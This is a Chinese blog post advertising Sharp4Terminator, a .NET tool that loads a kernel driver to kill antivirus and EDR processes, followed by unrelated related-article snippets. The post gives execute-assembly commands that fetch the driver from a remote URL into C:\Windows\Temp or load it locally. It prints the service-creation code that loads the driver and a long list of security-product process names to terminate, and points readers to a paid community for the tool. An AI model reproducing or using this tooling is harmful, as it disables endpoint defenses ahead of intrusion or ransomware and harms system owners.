.NET 一款利用内核驱动关闭AV/EDR的工具

最新推荐文章于 2024-10-15 17:50:18 发布
最新推荐文章于 2024-10-15 17:50:18 发布
阅读量488 收藏 9
点赞数 5
文章标签: .net windows 安全 矩阵 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ahhacker86/article/details/140038795
版权

01阅读须知

此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他方面

02基本介绍

Sharp4Terminator是一款基于.NET实现的利器,通过加载内核驱动程序来关闭反病毒软件或EDR进程。工具支持远程下载驱动和本地加载两种方式,通过驱动程序关闭常见的反病毒软件和EDR进程。

图片

03使用方法

Sharp4Terminator使用内核驱动程序关闭反病毒软件和EDR(Endpoint Detection and Response)进程。

3.1 远程下载驱动

通过指定远程URL,Sharp4Terminator将驱动程序下载到C:\Windows\Temp目录,并从该位置加载。具体用法如下所示。

execute-assembly Sharp4Terminator.exe --url "http://remoteurl.com:80/Terminator.sys"

3.2 本地加载驱动

通过指定本地磁盘路径,Sharp4Terminator直接加载驱动程序。具体用法如下。

execute-assembly Sharp4Terminator.exe --disk "C:\path\to\driver\Terminator.sys"

04核心代码

Sharp4Terminator过调用Windows服务管理API,打开服务控制管理器,创建一个新的服务并加载指定路径的驱动程序。具体代码如下所示。

private static bool LoadDriver(string driverPath)
{
    IntPtr hSCM = NativeMethods.OpenSCManager(null, null, NativeMethods.ServiceManagerAccess.SC_MANAGER_ALL_ACCESS);
    IntPtr hService = NativeMethods.OpenService(hSCM, "Mert", NativeMethods.ServiceAccess.SERVICE_ALL_ACCESS);
    hService = NativeMethods.CreateService(
        hSCM, "Mert", "MErt", NativeMethods.ServiceAccess.SERVICE_ALL_ACCESS, 
        NativeMethods.ServiceType.SERVICE_KERNEL_DRIVER, 
        NativeMethods.ServiceStartType.SERVICE_DEMAND_START, 
        NativeMethods.ServiceErrorControl.SERVICE_ERROR_IGNORE, 
        driverPath, null, IntPtr.Zero, null, null, null
    );
    NativeMethods.CloseServiceHandle(hService);
    NativeMethods.CloseServiceHandle(hSCM);
    return true;
}

Sharp4Terminator的另一个关键部分是针对EDR和反病毒软件进程的列表。工具通过检测并关闭这些进程来实现其目标。具体代码如下所示。

private static readonly string[] edrList = new string[]
{
    "activeconsole", "anti malware", "anti-malware", "antimalware", "anti virus", "anti-virus", "antivirus", 
    "appsense", "authtap", "avast", "avecto", "canary", "carbonblack", "carbon black", "cb.exe", 
    "ciscoamp", "cisco amp", "countercept", "countertack", "cramtray", "crssvc", "crowdstrike", 
    "csagent", "csfalcon", "csshell", "cybereason", "cyclorama", "cylance", "cyoptics", "cyupdate", 
    "cyvera", "cyserver", "cytray", "darktrace", "defendpoint", "defender", "eectrl", "elastic", 
    "endgame", "f-secure", "forcepoint", "fireeye", "groundling", "GRRservic", "inspector", 
    "ivanti", "kaspersky", "lacuna", "logrhythm", "malware", "mandiant", "mcafee", "morphisec", 
    "msascuil", "msmpeng", "nissrv", "omni", "omniagent", "osquery", "palo alto networks", 
    "pgeposervice", "pgsystemtray", "privilegeguard", "procwall", "protectorservic", "qradar", 
    "redcloak", "secureworks", "securityhealthservice", "semlaunchsv", "sentinel", "sepliveupdat", 
    "sisidsservice", "sisipsservice", "sisipsutil", "smc.exe", "smcgui", "snac64", "sophos", 
    "splunk", "srtsp", "symantec", "symcorpu", "symefasi", "sysinternal", "sysmon", "tanium", 
    "tda.exe", "tdawork", "tpython", "vectra", "wincollect", "windowssensor", "wireshark", 
    "threat", "xagt.exe", "xagtnotif.exe", "mssense"
};

上述列表包含了许多常见的EDR和反病毒软件进程名称。工具通过检测并尝试关闭这些进程,达到绕过防御系统的目的。工具已经打包在星球,感兴趣的朋友可以加入自取。

 05.NET安全星球

星球汇聚了各行业安全攻防技术大咖,并且每日分享.NET安全技术干货以及交流解答各类技术等问题,社区中发布很多高质量的.NET安全资源,可以说市面上很少见,都是干货。

图片

图片

图片

20+个专题栏目涵盖了点、线、面、体等知识面,助力师傅们快速成长!其中主题包括.NET Tricks、漏洞分析、内存马、代码审计、预编译、反序列化、webshell免杀、命令执行、C#工具库等等。

图片

我们倾力打造专刊、视频等配套学习资源,循序渐进的方式引导加深安全攻防技术提高以及岗位内推等等服务。

图片

图片

dot.Net安全矩阵
关注
恶意软件反向关闭EDR的原理、测试和反制思考
不忘初心,护天下安全!
07-01 1021
近来,看到曾经一起工作的兄弟在研究反制EDR,视频如下:R3对抗杀软,走杀软的路,让杀软无路可走~_哔哩哔哩_bilibili加载自带微软官方签名的sysinternals的进程管理驱动器(ProcExp) ,利用其导出函数做到 Kill EDR 的效果。参考了Backstab项目,主要进行如下行为:GitHub - Ryze-T/EdrKiller首先查看当前权限,判断是否使用管理员权限启动 提升权限为Debug 验证待操作的进程pid是否存在: 获取目录,加载自带微软官方签名的 ProcEx
红队系列-shellcode AV bypass Evasion免杀合集
aming小老弟
11-13 1499
壳就是软件所增加的保护,并不会破坏里面的程序结构,当我们运行这个加壳的程序时,系统首先会运行程序里的壳,然后由壳将加密的程序逐步还原到内存中,最后运行程序。加壳虽然对于特征码绕过有非常好的效果,加密壳基本上可以把特征码全部掩盖,但是缺点也非常的明显,因为壳自己也有特征,主流的壳如VMP, Themida等等。客户端上传特征,在云端无法检测到,则上传文件,文件通过杀软系统进行评判,得出总评分,对于无结果的,进行鉴定系统评分,总共得出结果返回给用户,并入云端库。比如可以远程读取png中的shellcode。
攻击技术研判|部署杀软驱动终止AVEDR进程
xnxqwzy的博客
08-19 129
作为杀毒软件却成为恶意软件的刀刃,值得我们反思杀毒软件的驱动在功能实现上是否足够安全,是否也有其他驱动有沦为攻击者的武器的可能性。从内核层发起的攻击对宿主机而言更加难以防御,更具攻击性。勒索软件在绕过安全机制的创新和想法上也是不断增加和进步,值得我们借鉴和学习。杀毒软件却成为恶意软件的刀刃,值得我们反思杀毒软件的驱动在功能实现上是否足够安全,是否也有其他驱动有沦为攻击者的武器的可能性。从内核层发起的攻击对宿主机而言更加难以防御,更具攻击性。
【高级持续性威胁跟踪】红队视角看Sunburst后门中的TTPs
further_eye的博客
01-04 2588
最近FireEye披露的黑客组织入侵SolarWinds的供应链攻击让安全从业人员印象深刻。一是影响规模大,SolarWinds官方称受影响的客户数量可能有18000家。二是攻击者留下的后门程序-Sunburst,十分隐蔽和具有迷惑性。
一款可以干掉杀毒跟EDR工具
Javachichi的博客
12-28 1194
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。(都打包成一块的了,不能一一展开,总共300多集)
卸载EDR软件提示:需要输入防护密码;教你在不需要密码的情况下,如何通过两步解决无法卸载的问题
热门推荐
CheyBen的博客
09-30 9万+
提示: 解决: 1、删除系统注册表中的EDR信息 win + R, 输入 regedit回车,打开注册列表 EDR程序存放的文件名称为sangfor 注册表中找到:HKEY_LOCAL_MACHINE >>> SOFTWARE >>> Sangfor,右击删除 2、删除EDR安装目录 这个步骤可以用360卫士的强力删除(右击鼠标)进行彻底删除 在安装EDR的时候,其实同时也安装了Ingress软件,这个可以直接卸载 ...
.NET 分享一款规避绕过EDR的红队工具
ahhacker86的专栏
05-04 435
Sharp4Terminator 一款基于.NET实现的使用内核驱动程序终止 AV/EDR 进程的工具
WG7310(WLAN+Bluetooth+FM)芯片在.Net MF中的应用
叶帆工作室
03-14 5630
WG7310芯片是Ti推出的一款芯片,集成了WLAN、Bluetooth、FM等功能(最近又推出了四合一的芯片,把GPS功能也集成了进去),由于以前在.Net MF上的一些工作是基于Ti DM335开发板上的,所以开发.Net MF系统的WiFi功能就选用了WG7310芯片。芯片的技术指标如下:功能规格:WLAN + Bluetooth+FM Combo 无线模块 主芯片厂
XiaoFeng.Mqtt中间件,支持.NET框架、.NET内核.NET标准库,一种非常方便操作
09-02
XiaoFeng.Mqtt中间件,支持.NET框架、.NET内核.NET标准库,一种非常方便操作的_XiaoFeng.Mqtt的_XiaoFeng.Mqtt.zip
内核源码。链接https://blog.csdn.net/tan1666/article/details/123156383
02-26
linux-5.8.6内核源码。链接https://blog.csdn.net/tan1666/article/details/123156383
嵌入式系统/ARM技术中的编写Windows CE.net的usb驱动程序教程
10-22
在嵌入式系统和ARM技术领域,开发针对Windows CE.NET的USB驱动程序是至关重要的,因为这使得设备能够与系统无缝交互。Windows CE.NET是一个功能强大的实时嵌入式操作系统,被广泛应用于各种智能设备和工业控制系统。...
winform 嵌套chrome浏览器,.net开发谷歌内核浏览器。
09-24
.NET框架下,WinForm应用程序可以借助第三方库来嵌入Chrome浏览器引擎,实现一个桌面应用内的Web浏览功能。本文将详细讲解如何使用Xilium.CefGlue库在WinForm中嵌入Chrome浏览器,并集成Flash插件。 Xilium....
ReClass.NET-KernelPlugin:一个用于ReClass.NET的简单内核级插件
05-19
一个简单的内核级读/写/查询/信息插件,用于ReClass.NET 如果计划使用驱动程序,则需要自己签名。 前一阵子做了,但是直到昨天才完成,经过一些测试,看起来还可以。 没有从内核端添加调试功能,但是如果我能解决...
.NET 中的 Web服务(Web Services)和WCF(Windows Communication Foundation)
最新发布
m0_60315436的博客
10-15 515
WCF 是微软在.NET 框架中推出的用于构建分布式应用程序的统一编程模型。它整合了之前微软的多种分布式通信技术,如 Web 服务、.NET Remoting、MSMQ(Microsoft Message Queuing)等,提供了一个功能强大、灵活且可扩展的通信平台。
【CS常见问题】你用的是VS2019,最高支持.NET5.0,但是项目将.NET6.0设为目标无法运行,怎么办?
敖丙007的博客
10-15 341
【CS常见问题】你用的是VS2019,最高支持.NET5.0,但是项目将.NET6.0设为目标无法运行,怎么办?
【三十一】【QT开发应用】QPushButton与QMenu
m0_74163972的博客
10-09 540
在这段代码中,通过将一个QMenu对象与关联,点击按钮时可以弹出菜单。pMenu是主菜单,而和是主菜单中的两个子菜单,分别用于文件管理和设置管理。为了组织菜单项,使用了数据结构,例如acList和setList,用于批量存储多个QAction对象。QAction代表菜单中的具体操作项,初始化时可以指定图标和文本,例如openFileAc使用图标和文本,和openUrAc仅使用文本。这些QAction对象通过this关联到父组件(通常是主窗口)。子菜单通过setIcon和setTitle。
力扣21~30题
SM_zeng的博客
10-10 884
我发现我都注释没怎么写过,导致写得时候思路没有特别清晰,所以要开始写注释了。
java集合
2301_76862031的博客
10-09 694
java中的集合,有ArrayList,LinkedList,HashSet,TreeSet,HaspMap,TreeMap,Propertiest的集合,使用
Stream流
m0_68319667的博客
10-12 953
一旦定义了一个流,就可以在一个表达式中链接多个操作,形成一个处理管道。提供了更简洁的语法,但在某些情况下,传统的循环可能更快。:流的操作可能会抛出异常,特别是在使用自定义函数作为参数时。是 Java 8 引入的一个重要特性,它是对集合数据进行操作的一种新的方式。:并行流在多线程环境中运行,因此需要考虑线程安全问题,尤其是在使用共享资源时。方法调用完毕后返回的不在是一个流的对象, 不能继续在使用Stream的功能。方法调用完毕后返回的依然是一个流的对象, 可以继续使用Stream的功能。
Android/Linux内核驱动程序详解
"Android的Linux内核驱动程序" 在Android操作系统中,Linux内核起着至关重要的作用。Android自早期版本开始就基于标准的Linux 2.6内核进行开发,随着时间的推移,内核版本也在不断更新,例如Android 1.0使用的是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值